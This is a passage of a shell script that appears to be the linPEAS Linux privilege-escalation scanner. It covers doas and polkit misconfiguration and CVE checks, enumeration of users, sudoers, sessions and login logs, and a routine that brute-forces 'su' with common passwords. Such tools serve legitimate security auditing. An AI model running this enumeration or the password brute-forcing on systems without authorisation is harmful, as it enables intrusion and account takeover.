   9501   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#doas"
   9502   if [ -n "$doas_bin" ]; then
   9503     print_3title "Doas binary and version" "T1548.003"
   9504     # -L makes permission checks describe the executable target, not a package-manager symlink.
   9505     doas_bin_owner="$(ls -ldLn "$doas_bin" 2>/dev/null | awk '{print $3}')"
   9506     doas_bin_mode="$(ls -ldL "$doas_bin" 2>/dev/null | awk '{print $1}')"
   9507     echo "Doas binary found at: $doas_bin" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9508     ls -ld "$doas_bin" 2>/dev/null
   9509     doas_bin_trusted="yes"
   9510     if [ "$doas_bin_owner" != "0" ]; then
   9511       echo "WARNING: doas is not owned by root (owner UID: ${doas_bin_owner:-unknown})" | sed -${E} "s,.*,${SED_RED},g"
   9512       doas_bin_trusted="no"
   9513     fi
   9514     if [ -u "$doas_bin" ]; then
   9515       echo "Doas has the expected SUID bit set (normal for a privilege-delegation binary)" | sed -${E} "s,.*,${SED_GREEN},g"
   9516     else
   9517       echo "Doas does not have its usual SUID bit; verify how privileges are granted" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9518       doas_bin_trusted="no"
   9519     fi
   9520     if { [ "$doas_current_uid" != "0" ] && [ -w "$doas_bin" ]; } || printf "%s" "$doas_bin_mode" | cut -c6,9 | grep -q w; then
   9521       echo "CRITICAL: doas is writable by a non-root context or by group/other" | sed -${E} "s,.*,${SED_RED},g"
   9522       doas_bin_trusted="no"
   9523     fi
   9524     doas_get_package_details "$doas_bin"
   9525     doas_upstream_version="$(doas_extract_upstream_version "$doas_package_full_version")"
   9526     if [ -n "$doas_package_full_version" ]; then
   9527       doas_package_label="$doas_package_name $doas_package_full_version (${doas_package_manager:-unknown manager}, implementation: $doas_package_implementation)"
   9528       echo "Package: $doas_package_label"
   9529       [ -n "$doas_package_homepage" ] && echo "Homepage: $doas_package_homepage"
   9530       if { [ "$doas_package_implementation" = "opendoas" ] || [ "$doas_package_implementation" = "unknown" ]; } && \
   9531          [ -n "$doas_upstream_version" ] && doas_version_ge "$doas_upstream_version" "6.6" && doas_version_lt "$doas_upstream_version" "6.8.1"; then
   9532         echo "Potentially vulnerable to CVE-2019-25016: OpenDoas 6.6 through 6.8 may inherit an attacker-controlled PATH for unrestricted rules (verify distro backports)" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9533       fi
   9534       if [ "$doas_package_implementation" = "slicer69" ] && [ -n "$doas_upstream_version" ] && doas_version_lt "$doas_upstream_version" "6.2"; then
   9535         echo "Potentially vulnerable to CVE-2019-15900 and CVE-2019-15901: slicer69/doas before 6.2 can mishandle identities/groups on non-OpenBSD platforms" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9536       elif [ "$doas_package_implementation" = "unknown" ] && [ -n "$doas_upstream_version" ] && doas_version_lt "$doas_upstream_version" "6.2"; then
   9537         echo "Old doas version detected; if this is the slicer69 portable implementation, review CVE-2019-15900 and CVE-2019-15901" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9538       fi
   9539       if [ "$(uname -s 2>/dev/null)" = "Linux" ] && \
   9540          { [ "$doas_package_implementation" = "opendoas" ] || [ "$doas_package_implementation" = "unknown" ]; } && \
   9541          [ -n "$doas_upstream_version" ] && doas_version_le "$doas_upstream_version" "6.8.2"; then
   9542         if [ -r /proc/sys/dev/tty/legacy_tiocsti ]; then
   9543           doas_tiocsti="$(cat /proc/sys/dev/tty/legacy_tiocsti 2>/dev/null)"
   9544           if [ "$doas_tiocsti" = "1" ]; then
   9545             echo "Potentially vulnerable to CVE-2023-28339: OpenDoas <=6.8.2 shares the terminal and legacy TIOCSTI is enabled" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9546           else
   9547             echo "CVE-2023-28339 TIOCSTI path appears mitigated (dev.tty.legacy_tiocsti=$doas_tiocsti)" | sed -${E} "s,.*,${SED_GREEN},g"
   9548           fi
   9549         else
   9550           echo "OpenDoas <=6.8.2 detected; review CVE-2023-28339 because the kernel TIOCSTI mitigation state could not be read" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9551         fi
   9552       fi
   9553     else
   9554       echo "Could not determine the installed doas package/version; check vendor advisories manually" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9555     fi
   9556   else
   9557     echo_not_found "doas"
   9558   fi
   9559   echo ""
   9560   print_3title "Doas configuration rules" "T1548.003"
   9561   doas_conf_found="no"
   9562   doas_seen_configs="|"
   9563   while IFS= read -r conf_file; do
   9564     [ -n "$conf_file" ] || continue
   9565     case "$doas_seen_configs" in *"|$conf_file|"*) continue ;; esac
   9566     doas_seen_configs="$doas_seen_configs$conf_file|"
   9567     [ -e "$conf_file" ] || continue
   9568     doas_conf_found="yes"
   9569     # Follow the final symlink for ownership/mode checks, but still report the indirection below.
   9570     doas_conf_owner="$(ls -ldLn "$conf_file" 2>/dev/null | awk '{print $3}')"
   9571     doas_conf_mode="$(ls -ldL "$conf_file" 2>/dev/null | awk '{print $1}')"
   9572     doas_conf_dir="$(dirname "$conf_file")"
   9573     doas_conf_dir_mode="$(ls -ld "$doas_conf_dir" 2>/dev/null | awk '{print $1}')"
   9574     echo "Found: $conf_file ($doas_conf_mode owner UID ${doas_conf_owner:-unknown})" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9575     doas_conf_trusted="yes"
   9576     if [ -L "$conf_file" ]; then
   9577       echo "WARNING: $conf_file is a symbolic link; verify its target and ownership" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9578     fi
   9579     if [ "$doas_conf_owner" != "0" ]; then
   9580       echo "CRITICAL: $conf_file is not owned by root" | sed -${E} "s,.*,${SED_RED},g"
   9581       doas_conf_trusted="no"
   9582     fi
   9583     if { [ "$doas_current_uid" != "0" ] && [ -w "$conf_file" ]; } || printf "%s" "$doas_conf_mode" | cut -c6,9 | grep -q w; then
   9584       echo "CRITICAL: $conf_file is writable by the current user, group, or other users" | sed -${E} "s,.*,${SED_RED},g"
   9585       doas_conf_trusted="no"
   9586     fi
   9587     if { [ "$doas_current_uid" != "0" ] && [ -w "$doas_conf_dir" ]; } || printf "%s" "$doas_conf_dir_mode" | cut -c6,9 | grep -q w; then
   9588       echo "CRITICAL: configuration directory $doas_conf_dir is writable; doas.conf may be replaceable" | sed -${E} "s,.*,${SED_RED},g"
   9589       doas_conf_trusted="no"
   9590     fi
   9591     if [ -r "$conf_file" ]; then
   9592       doas_active_rules="$(doas_read_rules "$conf_file")"
   9593       if [ -z "$doas_active_rules" ]; then
   9594         echo "No active permit/deny rules found in $conf_file"
   9595       else
   9596         while IFS="	" read -r doas_rule_number doas_rule_line; do
   9597           [ -n "$doas_rule_line" ] || continue
   9598           doas_rule_applies="no"
   9599           doas_rule_root="no"
   9600           doas_rule_nopass="no"
   9601           doas_rule_unrestricted="no"
   9602           doas_rule_dangerous="no"
   9603           doas_rule_env="no"
   9604           doas_rule_cmd_value="$(doas_rule_command "$doas_rule_line")"
   9605           doas_rule_applies_to_current_user "$doas_rule_line" && doas_rule_applies="yes"
   9606           doas_rule_targets_root "$doas_rule_line" && doas_rule_root="yes"
   9607           doas_rule_has_option "$doas_rule_line" nopass && doas_rule_nopass="yes"
   9608           [ -z "$doas_rule_cmd_value" ] && doas_rule_unrestricted="yes"
   9609           [ -n "$doas_rule_cmd_value" ] && doas_command_is_dangerous "$doas_rule_cmd_value" && doas_rule_dangerous="yes"
   9610           doas_rule_has_dangerous_environment "$doas_rule_line" && doas_rule_env="yes"
   9611           if printf "%s" "$doas_rule_line" | grep -q '^deny'; then
   9612             echo "  $conf_file:$doas_rule_number $doas_rule_line"
   9613             continue
   9614           fi
   9615           if [ "$doas_rule_applies" = "yes" ] && [ "$doas_rule_root" = "yes" ]; then
   9616             echo "  $conf_file:$doas_rule_number $doas_rule_line" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9617             if [ "$doas_rule_unrestricted" = "yes" ] && [ "$doas_rule_nopass" = "yes" ]; then
   9618               echo "POTENTIAL: a matching permit rule allows arbitrary root commands without a password; a later rule may override it" | sed -${E} "s,.*,${SED_RED},g"
   9619             elif [ "$doas_rule_unrestricted" = "yes" ]; then
   9620               echo "POTENTIAL: a matching permit rule allows arbitrary root commands after authentication; a later rule may override it" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9621             elif [ "$doas_rule_dangerous" = "yes" ] && [ "$doas_rule_nopass" = "yes" ]; then
   9622               echo "POTENTIAL: a matching permit rule allows GTFOBins-capable command $doas_rule_cmd_value as root without a password; a later rule may override it" | sed -${E} "s,.*,${SED_RED},g"
   9623               if [ "${doas_rule_cmd_value##*/}" = "dstat" ]; then
   9624                 echo "This is the HTB Soccer privilege-escalation pattern: a user-controlled dstat plugin can execute as root" | sed -${E} "s,.*,${SED_RED},g"
   9625               fi
   9626             elif [ "$doas_rule_dangerous" = "yes" ]; then
   9627               echo "POTENTIAL: a matching permit rule allows GTFOBins-capable command $doas_rule_cmd_value as root after authentication; a later rule may override it" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9628             elif [ "$doas_rule_nopass" = "yes" ]; then
   9629               echo "POTENTIAL: a matching permit rule allows $doas_rule_cmd_value as root without a password; inspect command-specific escapes and later rules" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9630             fi
   9631             if [ "$doas_rule_env" = "yes" ]; then
   9632               echo "Dangerous environment preservation is enabled for an applicable root rule (keepenv or sensitive setenv variable)" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9633             fi
   9634           elif [ "$doas_rule_root" = "yes" ] && { [ "$doas_rule_nopass" = "yes" ] || [ "$doas_rule_unrestricted" = "yes" ] || [ "$doas_rule_dangerous" = "yes" ]; }; then
   9635             echo "  $conf_file:$doas_rule_number $doas_rule_line" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9636           else
   9637             echo "  $conf_file:$doas_rule_number $doas_rule_line"
   9638           fi
   9639         done <<EOF
   9640 $doas_active_rules
   9641 EOF
   9642       fi
   9643     else
   9644       echo "Cannot read $conf_file directly; attempting safe effective-rule checks with doas -C"
   9645       doas_active_rules=""
   9646     fi
   9647     if [ -n "$doas_bin" ] && [ "$doas_bin_trusted" = "yes" ] && [ "$doas_conf_trusted" = "yes" ]; then
   9648       if doas_config_syntax_valid "$doas_bin" "$conf_file"; then
   9649         doas_test_commands="/bin/sh
   9650 /bin/bash
   9651 /usr/bin/env
   9652 /usr/bin/dstat"
   9653         while IFS="	" read -r doas_rule_number doas_rule_line; do
   9654           doas_rule_cmd_value="$(doas_rule_command "$doas_rule_line")"
   9655           [ -n "$doas_rule_cmd_value" ] && doas_test_commands="$doas_test_commands
   9656 $doas_rule_cmd_value"
   9657         done <<EOF
   9658 $doas_active_rules
   9659 EOF
   9660         doas_seen_test_commands="|"
   9661         while IFS= read -r doas_test_cmd; do
   9662           [ -n "$doas_test_cmd" ] || continue
   9663           case "$doas_seen_test_commands" in *"|$doas_test_cmd|"*) continue ;; esac
   9664           doas_seen_test_commands="$doas_seen_test_commands$doas_test_cmd|"
   9665           doas_check_output="$(doas_check_command "$doas_bin" "$conf_file" "$doas_test_cmd")"
   9666           case "$doas_check_output" in
   9667             "permit nopass"*)
   9668               echo "EFFECTIVE RULE: current user may run $doas_test_cmd as root without a password ($doas_check_output)" | sed -${E} "s,.*,${SED_RED},g"
   9669               ;;
   9670             permit*)
   9671               echo "Effective rule: current user may run $doas_test_cmd as root after authentication ($doas_check_output)" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9672               ;;
   9673           esac
   9674         done <<EOF
   9675 $doas_test_commands
   9676 EOF
   9677       else
   9678         echo "doas rejected or could not validate $conf_file with -C; inspect its syntax and security properties" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   9679       fi
   9680     fi
   9681   done <<EOF
   9682 $doas_conf_candidates
   9683 EOF
   9684   if [ "$doas_conf_found" = "no" ]; then
   9685     echo_not_found "doas.conf"
   9686   fi
   9687 else
   9688   echo_not_found "doas"
   9689 fi
   9690 echo ""
   9691 
   9692 fi
   9693 
   9694 if check_mitre_filter "T1548.003,T1548.004,T1068"; then
   9695 print_2title "Checking Pkexec and Polkit" "T1548.003,T1548.004,T1068"
   9696 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2"
   9697 echo ""
   9698 print_3title "Polkit Binary" "T1548.003,T1068"
   9699 # Check pkexec binary
   9700 pkexec_bin=$(command -v pkexec 2>/dev/null)
   9701 if [ -n "$pkexec_bin" ]; then
   9702   echo "Pkexec binary found at: $pkexec_bin" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9703   if [ -u "$pkexec_bin" ]; then
   9704     echo "Pkexec binary has SUID bit set!" | sed -${E} "s,.*,${SED_RED},g"
   9705   fi
   9706   ls -l "$pkexec_bin" 2>/dev/null
   9707   # Check polkit version for known vulnerabilities
   9708   if command -v pkexec >/dev/null 2>&1; then
   9709     pkexec --version 2>/dev/null
   9710     pkexec_version="$(pkexec --version 2>/dev/null | grep -oE '[0-9]+(\.[0-9]+)+')"
   9711     if [ "$pkexec_version" ] && [ "$(printf '%s\n' "$pkexec_version" "0.120" | sort -V | head -n1)" = "$pkexec_version" ] && [ "$pkexec_version" != "0.120" ]; then
   9712       echo "Potentially vulnerable to CVE-2021-4034 (PwnKit) - check distro patches" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   9713     fi
   9714   fi
   9715 fi
   9716 # Check polkit policies
   9717 echo ""
   9718 print_3title "Polkit Policies" "T1548.003"
   9719 for policy_dir in "/etc/polkit-1/localauthority.conf.d/" "/etc/polkit-1/rules.d/" "/usr/share/polkit-1/rules.d/"; do
   9720   if [ -d "$policy_dir" ]; then
   9721     echo "Checking $policy_dir:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
   9722     if [ -w "$policy_dir" ]; then
   9723       echo "WARNING: $policy_dir is writable!" | sed -${E} "s,.*,${SED_RED},g"
   9724     fi
   9725     for policy_file in "$policy_dir"/*; do
   9726       if [ -f "$policy_file" ]; then
   9727         if [ -w "$policy_file" ]; then
   9728           echo "WARNING: $policy_file is writable!" | sed -${E} "s,.*,${SED_RED},g"
   9729         fi
   9730         cat "$policy_file" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$Groups,${SED_RED},g"
   9731       fi
   9732     done
   9733   fi
   9734 done
   9735 # Check for polkit authentication agent
   9736 echo ""
   9737 print_3title "Polkit Authentication Agent" "T1548.004"
   9738 ps aux 2>/dev/null | grep -i "polkit" | grep -v "grep"
   9739 echo ""
   9740 
   9741 fi
   9742 
   9743 if check_mitre_filter "T1087.001"; then
   9744 print_2title "Superusers and UID 0 Users" "T1087.001"
   9745 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html"
   9746 # Check /etc/passwd for UID 0 users
   9747 echo ""
   9748 print_3title "Users with UID 0 in /etc/passwd" "T1087.001"
   9749 awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g"
   9750 if [ command -v getent >/dev/null 2>&1 ]; then
   9751     for group in sudo wheel adm docker lxd lxc root shadow disk video; do
   9752         if getent group "$group" >/dev/null 2>&1; then
   9753             echo "- Users in group '$group':"
   9754             getent group "$group" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_RED},g"
   9755         fi
   9756     done
   9757 fi
   9758 # Check for users with sudo privileges in sudoers
   9759 echo ""
   9760 print_3title "Users with sudo privileges in sudoers" "T1087.001"
   9761 grep -v "^#" /etc/sudoers 2>/dev/null | grep -v "^$" | grep -v "^Defaults" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g"
   9762 echo ""
   9763 
   9764 fi
   9765 
   9766 if check_mitre_filter "T1087.001"; then
   9767 print_2title "Users with console" "T1087.001"
   9768 if [ "$MACPEAS" ]; then
   9769   dscl . list /Users | while read un; do
   9770     ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2)
   9771     if grep -q "$ushell" /etc/shells; then #Shell user
   9772       dscl . -read "/Users/$un" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
   9773       echo ""
   9774     fi
   9775   done
   9776 else
   9777   no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
   9778   unexpected_shells=""
   9779   printf "%s\n" "$no_shells" | while read f; do
   9780     if [ -x "$f" ]; then
   9781       if [ "$TIMEOUT" ]; then
   9782         if $TIMEOUT 1 "$f" -c 'whoami' 2>/dev/null | grep -q "$USER"; then
   9783           unexpected_shells="$f\n$unexpected_shells"
   9784         fi
   9785       else
   9786         if "$f" -c 'whoami' 2>/dev/null | grep -q "$USER"; then
   9787           unexpected_shells="$f\n$unexpected_shells"
   9788         fi
   9789       fi
   9790     fi
   9791   done
   9792   grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
   9793   if [ "$unexpected_shells" ]; then
   9794     printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
   9795     echo "Unexpected users with shells:"
   9796     printf "%s\n" "$unexpected_shells" | while read f; do
   9797       if [ "$f" ]; then
   9798         grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
   9799       fi
   9800     done
   9801   fi
   9802 fi
   9803 echo ""
   9804 
   9805 fi
   9806 
   9807 if check_mitre_filter "T1087.001,T1069.001"; then
   9808 print_2title "All users & groups" "T1087.001,T1069.001"
   9809 if [ "$MACPEAS" ]; then
   9810   dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
   9811 else
   9812   cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
   9813 fi
   9814 echo ""
   9815 
   9816 fi
   9817 
   9818 if check_mitre_filter "T1033"; then
   9819 print_2title "Currently Logged in Users" "T1033"
   9820 # Check basic user information
   9821 echo ""
   9822 print_3title "Basic user information" "T1033"
   9823 (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
   9824 # Check for active sessions
   9825 echo ""
   9826 print_3title "Active sessions" "T1033"
   9827 if command -v w >/dev/null 2>&1; then
   9828   w 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
   9829 fi
   9830 # Check for logged in users via utmp
   9831 echo ""
   9832 print_3title "Logged in users (utmp)" "T1033"
   9833 if [ -f "/var/run/utmp" ]; then
   9834   who -a 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
   9835 fi
   9836 # Check for SSH sessions
   9837 echo ""
   9838 print_3title "SSH sessions" "T1033"
   9839 if command -v ss >/dev/null 2>&1; then
   9840   ss -tnp | grep ":22" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
   9841 fi
   9842 # Check for screen sessions
   9843 echo ""
   9844 print_3title "Screen sessions" "T1033"
   9845 if command -v screen >/dev/null 2>&1; then
   9846   screen -ls 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
   9847 fi
   9848 # Check for tmux sessions
   9849 echo ""
   9850 print_3title "Tmux sessions" "T1033"
   9851 if command -v tmux >/dev/null 2>&1; then
   9852   tmux list-sessions 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
   9853 fi
   9854 echo ""
   9855 
   9856 fi
   9857 
   9858 if check_mitre_filter "T1033"; then
   9859 print_2title "Last Logons and Login History" "T1033"
   9860 # Check last logins
   9861 echo ""
   9862 print_3title "Last logins" "T1033"
   9863 if command -v last >/dev/null 2>&1; then
   9864   last -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
   9865 fi
   9866 # Check failed login attempts
   9867 echo ""
   9868 print_3title "Failed login attempts" "T1033"
   9869 if command -v lastb >/dev/null 2>&1; then
   9870   lastb -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
   9871 fi
   9872 # Check auth logs for recent logins
   9873 echo ""
   9874 print_3title "Recent logins from auth.log (limit 20)" "T1033"
   9875 if [ -f "/var/log/auth.log" ]; then
   9876   grep -i "login\|authentication\|accepted" /var/log/auth.log 2>/dev/null | tail -n 20 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
   9877 fi
   9878 # Last time logon each user
   9879 echo ""
   9880 if command -v lastlog >/dev/null 2>&1; then
   9881   print_3title "Last time logon each user" "T1033"
   9882   lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
   9883 fi
   9884 EXISTS_FINGER="$(command -v finger 2>/dev/null || echo -n '')"
   9885 if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
   9886   dscl . list /Users | while read un; do
   9887     ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2)
   9888     if grep -q "$ushell" /etc/shells; then #Shell user
   9889       finger "$un" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
   9890       echo ""
   9891     fi
   9892   done
   9893 fi
   9894 echo ""
   9895 
   9896 fi
   9897 
   9898 if check_mitre_filter "T1201"; then
   9899 if [ "$EXTRA_CHECKS" ]; then
   9900   print_2title "Password policy" "T1201"
   9901   grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
   9902   echo ""
   9903   if [ "$MACPEAS" ]; then
   9904     print_2title "Relevant last user info and user configs" "T1201"
   9905     defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
   9906     echo ""
   9907     print_2title "Guest user status" "T1201"
   9908     sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
   9909     sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
   9910     sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
   9911     echo ""
   9912   fi
   9913 fi
   9914 
   9915 fi
   9916 
   9917 if check_mitre_filter "T1110.001"; then
   9918 if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then
   9919   print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
   9920   POSSIBE_SU_BRUTE=$(check_if_su_brute);
   9921   if [ "$POSSIBE_SU_BRUTE" ]; then
   9922     SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
   9923     printf "%s\n" "$SHELLUSERS" | while read u; do
   9924       echo "  Bruteforcing user $u..."
   9925       su_brute_user_num "$u" $PASSTRY
   9926     done
   9927   else
   9928     printf $GREEN"It's not possible to brute-force su.\n\n"$NC
   9929   fi
   9930 else
   9931   print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC
   9932 fi
   9933 print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
   9934 
   9935 fi
   9936 
   9937 if check_mitre_filter "T1069.001"; then
   9938 print_2title "Actual Group Memberships via newgrp" "T1069.001"
   9939 # Skip this probe when running as root to avoid root-only newgrp behavior
   9940 if [ "${IAMROOT:-0}" != "1" ]; then
   9941     ActualGroup="|"
   9942     while IFS=: read -r groupname _ gid _; do
   9943         result=$(timeout 1 sh -c "echo id | newgrp \"$groupname\"" 2>/dev/null)
   9944         if echo "$result" | grep -q "uid="; then
   9945             if ! echo "${Groups}|" | grep -Fq "|${groupname}|"; then
   9946                 ActualGroup="${ActualGroup}${groupname}|"
   9947                 echo "Accessible group not shown in id: $groupname (gid=$gid)" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$groupsB,${SED_RED},g"
   9948             fi
   9949         fi
   9950     done < /etc/group
   9951     echo ""
   9952 fi
   9953 
   9954 fi
   9955 
   9956 fi
   9957 
   9958 fi
   9959 echo ''
   9960 echo ''
   9961 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
   9962 
   9963 if echo $CHECKS | grep -q software_information; then
   9964 if check_mitre_filter "T1082,T1587.001,T1574,T1552.001,T1552.005,T1539,T1217,T1003.003,T1613,T1068,T1555.001,T1558.003,T1190,T1552.004,T1556.003,T1505.001,T1611,T1556,T1563,T1021.004"; then
   9965 print_title "Software Information"
   9966 if check_mitre_filter "T1082"; then
   9967 if ! [ "$SEARCH_IN_FOLDER" ]; then
   9968   print_2title "Useful software" "T1082"
   9969   for t in $USEFUL_SOFTWARE; do command -v "$t" || echo -n ''; done
   9970   echo ""
   9971 fi
   9972 
   9973 fi
   9974 
   9975 if check_mitre_filter "T1587.001"; then
   9976 if ! [ "$SEARCH_IN_FOLDER" ]; then
   9977   print_2title "Installed Compilers" "T1587.001"
